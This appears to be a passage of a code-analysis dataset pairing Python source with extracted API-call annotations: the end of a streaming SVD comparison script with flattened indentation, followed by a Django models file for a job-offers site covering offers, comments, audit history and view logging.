serial = np.load('Serial_Modes_MOS.npy')
parallel_online = np.load('Online_Parallel_POD.npy')
serial_online = np.load('Online_Serial_POD.npy')
plt.figure()
plt.plot(serial[:,0],label='serial one-shot')
plt.plot(parallel_online[:,0],label='parallel_online')
plt.plot(serial_online[:,0],label='serial_online')
plt.title('U comparison - column 0')
plt.xlabel('Domain')
plt.ylabel('U magnitude')
plt.legend()
plt.figure()
plt.plot(serial[:,2],label='serial one-shot')
plt.plot(parallel_online[:,2],label='parallel_online')
plt.plot(serial_online[:,2],label='serial_online')
plt.title('U comparison - column 2')
plt.xlabel('Domain')
plt.ylabel('U magnitude')
plt.legend()
serial_svs = np.load('Serial_SingularValues.npy')
serial_online_svs = np.load('Online_Serial_SingularValues.npy')
parallel_online_svs = np.load('Online_Parallel_SingularValues.npy')
plt.figure()
plt.plot(serial_svs[:self.K],label='serial one-shot')
plt.plot(parallel_online_svs[:self.K],label='parallel_online')
plt.plot(serial_online_svs[:self.K],label='serial_online')
plt.title('Singular values')
plt.xlabel('Index')
plt.ylabel('Magnitude')
plt.legend()
plt.show()
# Check orthogonality - should all be successful
check_ortho(serial,self.K)
check_ortho(serial_online,self.K)
check_ortho(parallel_online,self.K)
if __name__ == '__main__':
from time import time
# Initialize timer
start_time = time()
test_class = online_svd_calculator(10,1.0,low_rank=True)
iteration = 0
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.initialize(data)
for iteration in range(1,4):
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.incorporate_data(data)
end_time = time()
print('Time required for parallel streaming SVD (each rank):', end_time-start_time)
test_class.gather_modes() | [
"matplotlib.pyplot.ylabel",
"numpy.save",
"numpy.linalg.qr",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.matmul",
"numpy.random.seed",
"numpy.concatenate",
"numpy.random.normal",
"numpy.abs",
"numpy.linalg.eig",
"numpy.argmax",
"numpy.linalg.svd",
"matplotlib.pyplot.title"... | [((19, 37), 'numpy.random.seed', 'np.random.seed', (['(10)'], {}), '(10)\n', (33, 37), True, 'import numpy as np\n'), ((368, 390), 'numpy.linalg.eig', 'np.linalg.eig', (['new_mat'], {}), '(new_mat)\n', (381, 390), True, 'import numpy as np\n'), ((434, 459), 'numpy.argmax', 'np.argmax', (['(svals < 0.0001)'], {}), '(svals < 0.0001)\n', (443, 459), True, 'import numpy as np\n'), ((664, 697), 'numpy.random.normal', 'np.random.normal', ([], {'size': '(N, 2 * K)'}), '(size=(N, 2 * K))\n', (680, 697), True, 'import numpy as np\n'), ((805, 820), 'numpy.linalg.qr', 'np.linalg.qr', (['Y'], {}), '(Y)\n', (817, 820), True, 'import numpy as np\n'), ((883, 899), 'numpy.linalg.svd', 'np.linalg.svd', (['B'], {}), '(B)\n', (896, 899), True, 'import numpy as np\n'), ((916, 938), 'numpy.matmul', 'np.matmul', (['Qred', 'ustar'], {}), '(Qred, ustar)\n', (925, 938), True, 'import numpy as np\n'), ((7592, 7598), 'time.time', 'time', ([], {}), '()\n', (7596, 7598), False, 'from time import time\n'), ((7984, 7990), 'time.time', 'time', ([], {}), '()\n', (7988, 7990), False, 'from time import time\n'), ((338, 353), 'numpy.transpose', 'np.transpose', (['A'], {}), '(A)\n', (350, 353), True, 'import numpy as np\n'), ((412, 421), 'numpy.abs', 'np.abs', (['w'], {}), '(w)\n', (418, 421), True, 'import numpy as np\n'), ((723, 738), 'numpy.transpose', 'np.transpose', (['A'], {}), '(A)\n', (735, 738), True, 'import numpy as np\n'), ((767, 786), 'numpy.matmul', 'np.matmul', (['A', 'omega'], {}), '(A, omega)\n', (776, 786), True, 'import numpy as np\n'), ((840, 858), 'numpy.transpose', 'np.transpose', (['Qred'], {}), '(Qred)\n', (852, 858), True, 'import numpy as np\n'), ((2280, 2295), 'numpy.linalg.qr', 'np.linalg.qr', (['A'], {}), '(A)\n', (2292, 2295), True, 'import numpy as np\n'), ((5170, 5202), 'numpy.concatenate', 'np.concatenate', (['(ll, A)'], {'axis': '(-1)'}), '((ll, A), axis=-1)\n', (5184, 5202), True, 'import numpy as np\n'), ((5283, 5307), 'numpy.matmul', 
'np.matmul', (['qlocal', 'utemp'], {}), '(qlocal, utemp)\n', (5292, 5307), True, 'import numpy as np\n'), ((497, 513), 'numpy.abs', 'np.abs', (['w[:rval]'], {}), '(w[:rval])\n', (503, 513), True, 'import numpy as np\n'), ((2709, 2731), 'numpy.linalg.qr', 'np.linalg.qr', (['r_global'], {}), '(r_global)\n', (2721, 2731), True, 'import numpy as np\n'), ((2866, 2904), 'numpy.matmul', 'np.matmul', (['q', 'qglobal[:rlocal_shape_0]'], {}), '(q, qglobal[:rlocal_shape_0])\n', (2875, 2904), True, 'import numpy as np\n'), ((3527, 3548), 'numpy.matmul', 'np.matmul', (['q', 'qglobal'], {}), '(q, qglobal)\n', (3536, 3548), True, 'import numpy as np\n'), ((4949, 4998), 'numpy.concatenate', 'np.concatenate', (['(temp, phi_local[i + 1])'], {'axis': '(-1)'}), '((temp, phi_local[i + 1]), axis=-1)\n', (4963, 4998), True, 'import numpy as np\n'), ((5651, 5690), 'numpy.save', 'np.save', (['"""Online_Parallel_POD.npy"""', 'phi'], {}), "('Online_Parallel_POD.npy', phi)\n", (5658, 5690), True, 'import numpy as np\n'), ((5702, 5760), 'numpy.save', 'np.save', (['"""Online_Parallel_SingularValues.npy"""', 'self.svalue'], {}), "('Online_Parallel_SingularValues.npy', self.svalue)\n", (5709, 5760), True, 'import numpy as np\n'), ((5805, 5836), 'numpy.load', 'np.load', (['"""Serial_Modes_MOS.npy"""'], {}), "('Serial_Modes_MOS.npy')\n", (5812, 5836), True, 'import numpy as np\n'), ((5867, 5901), 'numpy.load', 'np.load', (['"""Online_Parallel_POD.npy"""'], {}), "('Online_Parallel_POD.npy')\n", (5874, 5901), True, 'import numpy as np\n'), ((5930, 5962), 'numpy.load', 'np.load', (['"""Online_Serial_POD.npy"""'], {}), "('Online_Serial_POD.npy')\n", (5937, 5962), True, 'import numpy as np\n'), ((5976, 5988), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (5986, 5988), True, 'import matplotlib.pyplot as plt\n'), ((6001, 6048), 'matplotlib.pyplot.plot', 'plt.plot', (['serial[:, 0]'], {'label': '"""serial one-shot"""'}), "(serial[:, 0], label='serial one-shot')\n", (6009, 6048), True, 'import 
matplotlib.pyplot as plt\n'), ((6059, 6115), 'matplotlib.pyplot.plot', 'plt.plot', (['parallel_online[:, 0]'], {'label': '"""parallel_online"""'}), "(parallel_online[:, 0], label='parallel_online')\n", (6067, 6115), True, 'import matplotlib.pyplot as plt\n'), ((6126, 6178), 'matplotlib.pyplot.plot', 'plt.plot', (['serial_online[:, 0]'], {'label': '"""serial_online"""'}), "(serial_online[:, 0], label='serial_online')\n", (6134, 6178), True, 'import matplotlib.pyplot as plt\n'), ((6189, 6225), 'matplotlib.pyplot.title', 'plt.title', (['"""U comparison - column 0"""'], {}), "('U comparison - column 0')\n", (6198, 6225), True, 'import matplotlib.pyplot as plt\n'), ((6238, 6258), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Domain"""'], {}), "('Domain')\n", (6248, 6258), True, 'import matplotlib.pyplot as plt\n'), ((6271, 6296), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""U magnitude"""'], {}), "('U magnitude')\n", (6281, 6296), True, 'import matplotlib.pyplot as plt\n'), ((6309, 6321), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6319, 6321), True, 'import matplotlib.pyplot as plt\n'), ((6335, 6347), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6345, 6347), True, 'import matplotlib.pyplot as plt\n'), ((6360, 6407), 'matplotlib.pyplot.plot', 'plt.plot', (['serial[:, 2]'], {'label': '"""serial one-shot"""'}), "(serial[:, 2], label='serial one-shot')\n", (6368, 6407), True, 'import matplotlib.pyplot as plt\n'), ((6418, 6474), 'matplotlib.pyplot.plot', 'plt.plot', (['parallel_online[:, 2]'], {'label': '"""parallel_online"""'}), "(parallel_online[:, 2], label='parallel_online')\n", (6426, 6474), True, 'import matplotlib.pyplot as plt\n'), ((6485, 6537), 'matplotlib.pyplot.plot', 'plt.plot', (['serial_online[:, 2]'], {'label': '"""serial_online"""'}), "(serial_online[:, 2], label='serial_online')\n", (6493, 6537), True, 'import matplotlib.pyplot as plt\n'), ((6548, 6584), 'matplotlib.pyplot.title', 'plt.title', (['"""U comparison - 
column 2"""'], {}), "('U comparison - column 2')\n", (6557, 6584), True, 'import matplotlib.pyplot as plt\n'), ((6597, 6617), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Domain"""'], {}), "('Domain')\n", (6607, 6617), True, 'import matplotlib.pyplot as plt\n'), ((6630, 6655), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""U magnitude"""'], {}), "('U magnitude')\n", (6640, 6655), True, 'import matplotlib.pyplot as plt\n'), ((6668, 6680), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6678, 6680), True, 'import matplotlib.pyplot as plt\n'), ((6707, 6743), 'numpy.load', 'np.load', (['"""Serial_SingularValues.npy"""'], {}), "('Serial_SingularValues.npy')\n", (6714, 6743), True, 'import numpy as np\n'), ((6776, 6819), 'numpy.load', 'np.load', (['"""Online_Serial_SingularValues.npy"""'], {}), "('Online_Serial_SingularValues.npy')\n", (6783, 6819), True, 'import numpy as np\n'), ((6854, 6899), 'numpy.load', 'np.load', (['"""Online_Parallel_SingularValues.npy"""'], {}), "('Online_Parallel_SingularValues.npy')\n", (6861, 6899), True, 'import numpy as np\n'), ((6913, 6925), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6923, 6925), True, 'import matplotlib.pyplot as plt\n'), ((6938, 6992), 'matplotlib.pyplot.plot', 'plt.plot', (['serial_svs[:self.K]'], {'label': '"""serial one-shot"""'}), "(serial_svs[:self.K], label='serial one-shot')\n", (6946, 6992), True, 'import matplotlib.pyplot as plt\n'), ((7004, 7067), 'matplotlib.pyplot.plot', 'plt.plot', (['parallel_online_svs[:self.K]'], {'label': '"""parallel_online"""'}), "(parallel_online_svs[:self.K], label='parallel_online')\n", (7012, 7067), True, 'import matplotlib.pyplot as plt\n'), ((7079, 7138), 'matplotlib.pyplot.plot', 'plt.plot', (['serial_online_svs[:self.K]'], {'label': '"""serial_online"""'}), "(serial_online_svs[:self.K], label='serial_online')\n", (7087, 7138), True, 'import matplotlib.pyplot as plt\n'), ((7150, 7178), 'matplotlib.pyplot.title', 'plt.title', (['"""Singular 
values"""'], {}), "('Singular values')\n", (7159, 7178), True, 'import matplotlib.pyplot as plt\n'), ((7191, 7210), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Index"""'], {}), "('Index')\n", (7201, 7210), True, 'import matplotlib.pyplot as plt\n'), ((7223, 7246), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Magnitude"""'], {}), "('Magnitude')\n", (7233, 7246), True, 'import matplotlib.pyplot as plt\n'), ((7259, 7271), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (7269, 7271), True, 'import matplotlib.pyplot as plt\n'), ((7284, 7294), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7292, 7294), True, 'import matplotlib.pyplot as plt\n'), ((1175, 1210), 'numpy.sum', 'np.sum', (['(modes[:, m1] * modes[:, m2])'], {}), '(modes[:, m1] * modes[:, m2])\n', (1181, 1210), True, 'import numpy as np\n'), ((1372, 1407), 'numpy.sum', 'np.sum', (['(modes[:, m1] * modes[:, m2])'], {}), '(modes[:, m1] * modes[:, m2])\n', (1378, 1407), True, 'import numpy as np\n'), ((2606, 2653), 'numpy.concatenate', 'np.concatenate', (['(temp, r_global[i + 1])'], {'axis': '(0)'}), '((temp, r_global[i + 1]), axis=0)\n', (2620, 2653), True, 'import numpy as np\n'), ((3321, 3342), 'numpy.linalg.svd', 'np.linalg.svd', (['rfinal'], {}), '(rfinal)\n', (3334, 3342), True, 'import numpy as np\n'), ((3903, 3918), 'numpy.diag', 'np.diag', (['slocal'], {}), '(slocal)\n', (3910, 3918), True, 'import numpy as np\n'), ((4163, 4210), 'numpy.concatenate', 'np.concatenate', (['(temp, wglobal[i + 1])'], {'axis': '(-1)'}), '((temp, wglobal[i + 1]), axis=-1)\n', (4177, 4210), True, 'import numpy as np\n'), ((4361, 4383), 'numpy.linalg.svd', 'np.linalg.svd', (['wglobal'], {}), '(wglobal)\n', (4374, 4383), True, 'import numpy as np\n'), ((4798, 4831), 'numpy.matmul', 'np.matmul', (['A', 'x[:, mode:mode + 1]'], {}), '(A, x[:, mode:mode + 1])\n', (4807, 4831), True, 'import numpy as np\n'), ((5135, 5155), 'numpy.diag', 'np.diag', (['self.svalue'], {}), '(self.svalue)\n', (5142, 5155), 
True, 'import numpy as np\n'), ((5593, 5641), 'numpy.concatenate', 'np.concatenate', (['(phi, phi_global[i + 1])'], {'axis': '(0)'}), '((phi, phi_global[i + 1]), axis=0)\n', (5607, 5641), True, 'import numpy as np\n'), ((1231, 1250), 'numpy.isclose', 'np.isclose', (['s_', '(1.0)'], {}), '(s_, 1.0)\n', (1241, 1250), True, 'import numpy as np\n'), ((1428, 1447), 'numpy.isclose', 'np.isclose', (['s_', '(0.0)'], {}), '(s_, 0.0)\n', (1438, 1447), True, 'import numpy as np\n')] |
import html
import json
import re
from datetime import date
from autoslug import AutoSlugField
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.core.validators import MinLengthValidator
from django.db.models.aggregates import Count
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from django.utils.timezone import now
from django.utils.translation import gettext as _
from easyaudit.models import CRUDEvent
from taggit_autosuggest.managers import TaggableManager
from pycompanies.models import UserCompanyProfile
from .constants import STATE_LABEL_CLASSES
class EventType(models.IntegerChoices):
    """
    Types of joboffer visualization events.

    Stored as small integers on ``JobOfferAccessLog.event_type``; the labels
    are the translated, human-readable descriptions.
    """
    # Offer rendered inside a listing page.
    LISTING_VIEW = (0, _('Visualización en Listado'))
    # Full offer detail page opened.
    DETAIL_VIEW = (1, _('Visualización de la oferta completa'))
    # Contact information section revealed.
    CONTACT_INFO_VIEW = (2, _('Apertura de la información de contacto'))
class Experience(models.TextChoices):
    """
    Choices for JobOffer Experience.

    Stored value and label are the same short string (years of experience,
    e.g. '5+'); ``JobOffer.experience`` allows at most 3 characters.
    """
    ZERO = '0', _('0')
    ONE_PLUS = '1+', _('1+')
    TWO_PLUS = '2+', _('2+')
    THREE_PLUS = '3+', _('3+')
    FIVE_PLUS = '5+', _('5+')
    TEN_PLUS = '10+', _('10+')
class Remoteness(models.TextChoices):
    """
    Choices for Remoteness (work modality of a JobOffer).

    NOTE: member names differ from the stored values for OFFICE
    ('IN_OFFICE') and HYBRID ('MIXED'). Non-REMOTE offers must also carry a
    location (enforced by a check constraint on JobOffer).
    """
    REMOTE = 'REMOTE', _('Remoto')
    OFFICE = 'IN_OFFICE', _('Presencial')
    HYBRID = 'MIXED', _('Mixto')
class HiringType(models.TextChoices):
    """
    Choices for HiringType (contractual relationship offered).
    """
    EMPLOYEE = 'EMPLOYEE', _('Relación de dependencia')
    MONOTRIBUTISTA = 'MONOTRIBUTO', _('Monotributista')
    CONTRACTOR_SHORT = 'CONTRACTOR_SHORT', _('Contractor short term')
    CONTRACTOR_LONG = 'CONTRACTOR_LONG', _('Contractor long term')
    COOPERATIVE = 'COOPERATIVE', _('Cooperativa de trabajo')
    GOVERNMENT = 'GOVERNMENT', _('Estado')
    OTHER = 'OTHER', _('Otra')
class OfferState(models.TextChoices):
    """
    Choices for JobOffer states (moderation workflow).

    DEACTIVATED is the default for ``JobOffer.state``.
    """
    NEW = 'NEW', _('Nuevo')  # Used only for actions
    DEACTIVATED = 'DEACTIVATED', _('Desactivada')
    MODERATION = 'MODERATION', _('En moderación')
    ACTIVE = 'ACTIVE', _('Activa')
    REJECTED = 'REJECTED', _('Rechazada')
    EXPIRED = 'EXPIRED', _('Caducada')
class JobOffer(models.Model):
    """A PyAr Job Offer.

    Offers move through the ``OfferState`` workflow. Contact details may be
    a mail address, a phone number and/or a URL, but at least one of the
    three is required (DB check constraint in ``Meta``); likewise a location
    is required unless the offer is fully remote.
    """
    title = models.CharField(
        max_length=255, verbose_name=_('Título'), validators=[MinLengthValidator(20)], unique=True
    )
    company = models.ForeignKey(
        'pycompanies.Company',
        verbose_name=_('Empresa'),
        on_delete=models.CASCADE,
    )
    # Required (via Meta constraint) when remoteness is HYBRID or OFFICE.
    location = models.CharField(max_length=100, blank=True, null=True, verbose_name=_('Lugar'))
    contact_mail = models.EmailField(
        max_length=255, blank=True, null=True, verbose_name=_('E-mail')
    )
    contact_phone = models.CharField(
        max_length=255, null=True, blank=True, verbose_name=_('Teléfono')
    )
    contact_url = models.CharField(
        max_length=255, null=True, blank=True, verbose_name=_('URL Contacto')
    )
    experience = models.CharField(
        max_length=3, choices=Experience.choices, verbose_name=_('Experiencia')
    )
    remoteness = models.CharField(
        max_length=32, choices=Remoteness.choices, verbose_name=_('Modalidad de trabajo')
    )
    tags = TaggableManager(verbose_name=_('Etiquetas'), blank=True)
    hiring_type = models.CharField(
        max_length=32, choices=HiringType.choices, verbose_name=_('Tipo de contratación')
    )
    salary = models.CharField(
        max_length=255, null=True, verbose_name=_('Rango salarial')
    )
    description = models.TextField(verbose_name=_('Descripción'))
    # Auto-derived from ``description`` on save when left empty; max_length
    # matches the 512-char slice taken in ``get_short_description``.
    short_description = models.TextField(
        max_length=512,
        verbose_name=_('Descripción corta')
    )
    created_at = models.DateTimeField(
        auto_now_add=True, verbose_name=_('Hora de creación')
    )
    created_by = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
        verbose_name=_('Creado por'),
        related_name='created_offers',
    )
    modified_at = models.DateTimeField(auto_now=True, verbose_name=_('Hora de Modificación'))
    modified_by = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
        verbose_name=_('Modificado por'),
        related_name='modified_offers',
    )
    state = models.CharField(
        max_length=32, choices=OfferState.choices, default=OfferState.DEACTIVATED,
        verbose_name=_('Estado de la oferta')
    )
    # Also recomputed from title explicitly in save() below.
    slug = AutoSlugField(populate_from='title', unique=True)

    def get_absolute_url(self):
        """Return the absolute URL (BASE_URL + detail view path) of the offer."""
        url = reverse('joboffers:view', kwargs={'slug': self.slug})
        absolute_url = "".join((settings.BASE_URL, url))
        return absolute_url

    def __str__(self):
        return self.title

    @property
    def last_comment(self):
        """
        Return the most recent JobOfferComment attached to this offer, or
        None when there is none (typically the latest rejection/moderation
        note).
        """
        return self.joboffercomment_set.last()

    @classmethod
    def get_short_description(cls, description):
        """
        Deduce the short_description from a given html description string:
        strip tags, collapse whitespace, unescape HTML entities and truncate
        to 512 characters (the short_description field length).
        """
        description_stripped_tags = re.sub(r'<[^>]*>', ' ', description)
        description_without_spaces = re.sub(r'\s+', ' ', description_stripped_tags).strip()
        description_unescaped = html.unescape(description_without_spaces)
        return description_unescaped[:512]

    def track_visualization(self, session, event_type: EventType):
        """
        Either get or create the matching JobOfferAccessLog instance for the
        joboffer, so each session is counted at most once per month per
        event type. Returns the (instance, created) tuple from
        get_or_create.
        """
        today = date.today()
        # Encoded as year * 100 + month, e.g. 202401 for January 2024.
        month_year = today.year * 100 + today.month

        # Persist the session first so it has a key we can record.
        if session.session_key is None:
            session.save()

        return JobOfferAccessLog.objects.get_or_create(
            month_and_year=month_year,
            event_type=event_type,
            session=session.session_key,
            joboffer=self
        )

    def get_publisher_mail_addresses(self):
        """
        Return a set of the email addresses of the publishers of this offer.
        It filters users with empty mail field
        """
        profiles = UserCompanyProfile.objects.filter(company=self.company)
        addresses = set()

        for profile in profiles:
            if profile.user.email:
                addresses.add(profile.user.email)

        return addresses

    def get_visualizations_count(self):
        """
        Get a dict with visualizations count for every kind of event,
        mapping the raw event_type value to its total.
        """
        items = JobOfferAccessLog.objects \
                                 .filter(joboffer=self) \
                                 .values_list('event_type') \
                                 .annotate(total=Count('event_type')) \
                                 .order_by()
        return dict(items)

    def save(self, *args, **kwargs):
        # Keep the slug in sync with the (unique) title on every save.
        self.slug = slugify(self.title)

        # Derive the short description only when the user left it empty.
        if not self.short_description:
            self.short_description = self.get_short_description(self.description)

        super().save(*args, **kwargs)

    @classmethod
    def get_options(cls):
        """
        Public _meta API accesor https://docs.djangoproject.com/en/4.0/ref/models/meta/
        """
        return cls._meta

    class Meta:
        constraints = [
            # At least one contact channel (mail, phone or URL) must be set.
            models.CheckConstraint(
                name='%(app_label)s_%(class)s_not_all_contact_info_null',
                check=(
                    models.Q(
                        contact_mail__isnull=False,
                    )
                    | models.Q(
                        contact_phone__isnull=False,
                    )
                    | models.Q(
                        contact_url__isnull=False,
                    )
                ),
            ),
            # Non-remote offers must carry a location.
            models.CheckConstraint(
                name='%(app_label)s_%(class)s_location_not_null_when_not_remote',
                check=(
                    (
                        models.Q(remoteness__in=(Remoteness.HYBRID, Remoteness.OFFICE))
                        & models.Q(location__isnull=False)
                    )
                    | models.Q(remoteness=Remoteness.REMOTE)
                ),
            ),
        ]
class CommentType(models.TextChoices):
    """
    Choices for Types of JobOfferComments (reviewer feedback categories).
    """
    MODERATION = 'MODERATION', _('Moderación')
    EDITION = 'EDITION', _('Edición')
    SPAM = 'SPAM', _('Spam')
    INSUFICIENT = 'INSUFICIENT', _('Información insuficiente')
    # NOTE: the stored value is 'NOT_PYTHON', not 'NOT_RELATED'.
    NOT_RELATED = 'NOT_PYTHON', _('Oferta no relacionada con Python')
class JobOfferComment(models.Model):
    """
    A comment on a JobOffer: reviewer feedback classified by CommentType.
    """
    text = models.TextField(verbose_name=_('Texto'))
    comment_type = models.CharField(
        max_length=32, choices=CommentType.choices, verbose_name=_('Tipo'))
    # Fix: verbose_name previously read _('Rango salarial') ("salary range"),
    # copy-pasted from JobOffer.salary; it now matches JobOffer.created_at.
    created_at = models.DateTimeField(
        auto_now_add=True, verbose_name=_('Hora de creación')
    )
    created_by = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
        verbose_name=_('Creado por'),
        related_name='created_joboffer_comments',
    )
    joboffer = models.ForeignKey(JobOffer, on_delete=models.CASCADE)

    @classmethod
    def get_options(cls):
        """
        Public _meta API accesor https://docs.djangoproject.com/en/4.0/ref/models/meta/
        """
        return cls._meta

    def __str__(self):
        return f"{self.joboffer.title}: {self.get_comment_type_display()}"
class JobOfferHistoryManager(models.Manager):
    """Manager exposing the combined change history of a joboffer."""

    def for_offer(self, joboffer):
        """
        Get all the history objects for a given joboffer: CRUD events
        recorded against the JobOffer itself plus those recorded against
        any of its JobOfferComments.
        """
        joboffer_ctype = ContentType.objects.get(app_label='joboffers', model='joboffer')
        comment_ctype = ContentType.objects.get(
            app_label='joboffers', model='joboffercomment'
        )

        # Events on the offer itself. event_type < 4 — presumably this
        # excludes the m2m-change events; confirm against easyaudit's
        # CRUDEvent event-type constants.
        events_on_offer = models.Q(
            event_type__lt=4, object_id=joboffer.id, content_type=joboffer_ctype
        )

        comment_ids = [comment.id for comment in joboffer.joboffercomment_set.all()]
        events_on_comments = models.Q(
            object_id__in=comment_ids, content_type=comment_ctype
        )

        return super().get_queryset().filter(events_on_offer | events_on_comments)
class JobOfferHistory(CRUDEvent):
    """
    Proxy over easyaudit's CRUDEvent adding joboffer-aware accessors, so the
    controllers/templates don't have to decode the audit payload themselves.
    """
    objects = JobOfferHistoryManager()

    @property
    def fields(self):
        """
        Return the field dict of the audited object as of this change.

        The snapshot was serialized at audit time, so its keys can differ
        from the current model's fields.
        """
        snapshot = json.loads(self.object_json_repr)
        return snapshot[0]['fields']

    @property
    def joboffer_comment(self):
        """
        Return the JobOfferComment instance this history entry refers to.

        Raises ValueError when the entry does not audit a JobOfferComment.
        """
        if self.content_type.model != 'joboffercomment':
            raise ValueError("Unexpected model. Expected a JobOfferComment instance.")

        return JobOfferComment.objects.get(id=self.object_id)

    @property
    def changes(self):
        """
        Return the decoded changed-fields dict, or None when none recorded.
        """
        return json.loads(self.changed_fields) if self.changed_fields else None

    @property
    def state_label(self):
        """
        Human-readable state of the joboffer at the time of this change.

        Raises ValueError when the entry does not audit a JobOffer.
        """
        if self.content_type.model != 'joboffer':
            raise ValueError("Unexpected model. Expected a JobOffer instance.")

        # Build a throwaway (unsaved) JobOffer just to reuse its
        # get_state_display() translation of the stored state value.
        return JobOffer(state=self.fields['state']).get_state_display()

    @property
    def state_label_class(self):
        """
        Bootstrap label class matching the joboffer state at this change.

        Raises ValueError when the entry does not audit a JobOffer, and
        KeyError if the snapshot has no 'state' field or the state is not in
        STATE_LABEL_CLASSES.
        """
        if self.content_type.model != 'joboffer':
            raise ValueError("Unexpected model. Expected a JobOffer instance.")

        return STATE_LABEL_CLASSES[self.fields['state']]

    class Meta:
        proxy = True
class JobOfferAccessLog(models.Model):
    """
    Model to track visualization of joboffers.

    Rows are deduplicated per (month_and_year, event_type, session,
    joboffer) by ``JobOffer.track_visualization`` (get_or_create), so each
    session counts at most once per month for each event type.
    """
    created_at = models.DateTimeField(default=now)
    # Encoded as year * 100 + month (e.g. 202401) by track_visualization.
    month_and_year = models.PositiveIntegerField()
    event_type = models.PositiveSmallIntegerField(
        choices=EventType.choices, verbose_name=_('Tipo de Evento')
    )
    # Django session key identifying the visitor (session keys are 40 chars).
    session = models.CharField(max_length=40, verbose_name=_('Identificador de Sesión'))
    joboffer = models.ForeignKey(JobOffer, on_delete=models.CASCADE)

    class Meta:
        ordering = ['created_at']
| [
"django.utils.text.slugify",
"json.loads",
"pycompanies.models.UserCompanyProfile.objects.filter",
"django.utils.translation.gettext",
"django.contrib.contenttypes.models.ContentType.objects.get",
"django.db.models.ForeignKey",
"autoslug.AutoSlugField",
"html.unescape",
"django.db.models.Q",
"djan... | [((4512, 4561), 'autoslug.AutoSlugField', 'AutoSlugField', ([], {'populate_from': '"""title"""', 'unique': '(True)'}), "(populate_from='title', unique=True)\n", (4525, 4561), False, 'from autoslug import AutoSlugField\n'), ((9125, 9178), 'django.db.models.ForeignKey', 'models.ForeignKey', (['JobOffer'], {'on_delete': 'models.CASCADE'}), '(JobOffer, on_delete=models.CASCADE)\n', (9142, 9178), False, 'from django.db import models\n'), ((12468, 12501), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'now'}), '(default=now)\n', (12488, 12501), False, 'from django.db import models\n'), ((12523, 12552), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {}), '()\n', (12550, 12552), False, 'from django.db import models\n'), ((12782, 12835), 'django.db.models.ForeignKey', 'models.ForeignKey', (['JobOffer'], {'on_delete': 'models.CASCADE'}), '(JobOffer, on_delete=models.CASCADE)\n', (12799, 12835), False, 'from django.db import models\n'), ((780, 809), 'django.utils.translation.gettext', '_', (['"""Visualización en Listado"""'], {}), "('Visualización en Listado')\n", (781, 809), True, 'from django.utils.translation import gettext as _\n'), ((833, 873), 'django.utils.translation.gettext', '_', (['"""Visualización de la oferta completa"""'], {}), "('Visualización de la oferta completa')\n", (834, 873), True, 'from django.utils.translation import gettext as _\n'), ((903, 946), 'django.utils.translation.gettext', '_', (['"""Apertura de la información de contacto"""'], {}), "('Apertura de la información de contacto')\n", (904, 946), True, 'from django.utils.translation import gettext as _\n'), ((1057, 1063), 'django.utils.translation.gettext', '_', (['"""0"""'], {}), "('0')\n", (1058, 1063), True, 'from django.utils.translation import gettext as _\n'), ((1085, 1092), 'django.utils.translation.gettext', '_', (['"""1+"""'], {}), "('1+')\n", (1086, 1092), True, 'from django.utils.translation import gettext as _\n'), 
((1114, 1121), 'django.utils.translation.gettext', '_', (['"""2+"""'], {}), "('2+')\n", (1115, 1121), True, 'from django.utils.translation import gettext as _\n'), ((1145, 1152), 'django.utils.translation.gettext', '_', (['"""3+"""'], {}), "('3+')\n", (1146, 1152), True, 'from django.utils.translation import gettext as _\n'), ((1175, 1182), 'django.utils.translation.gettext', '_', (['"""5+"""'], {}), "('5+')\n", (1176, 1182), True, 'from django.utils.translation import gettext as _\n'), ((1205, 1213), 'django.utils.translation.gettext', '_', (['"""10+"""'], {}), "('10+')\n", (1206, 1213), True, 'from django.utils.translation import gettext as _\n'), ((1321, 1332), 'django.utils.translation.gettext', '_', (['"""Remoto"""'], {}), "('Remoto')\n", (1322, 1332), True, 'from django.utils.translation import gettext as _\n'), ((1359, 1374), 'django.utils.translation.gettext', '_', (['"""Presencial"""'], {}), "('Presencial')\n", (1360, 1374), True, 'from django.utils.translation import gettext as _\n'), ((1397, 1407), 'django.utils.translation.gettext', '_', (['"""Mixto"""'], {}), "('Mixto')\n", (1398, 1407), True, 'from django.utils.translation import gettext as _\n'), ((1519, 1547), 'django.utils.translation.gettext', '_', (['"""Relación de dependencia"""'], {}), "('Relación de dependencia')\n", (1520, 1547), True, 'from django.utils.translation import gettext as _\n'), ((1584, 1603), 'django.utils.translation.gettext', '_', (['"""Monotributista"""'], {}), "('Monotributista')\n", (1585, 1603), True, 'from django.utils.translation import gettext as _\n'), ((1647, 1673), 'django.utils.translation.gettext', '_', (['"""Contractor short term"""'], {}), "('Contractor short term')\n", (1648, 1673), True, 'from django.utils.translation import gettext as _\n'), ((1715, 1740), 'django.utils.translation.gettext', '_', (['"""Contractor long term"""'], {}), "('Contractor long term')\n", (1716, 1740), True, 'from django.utils.translation import gettext as _\n'), ((1774, 1801), 
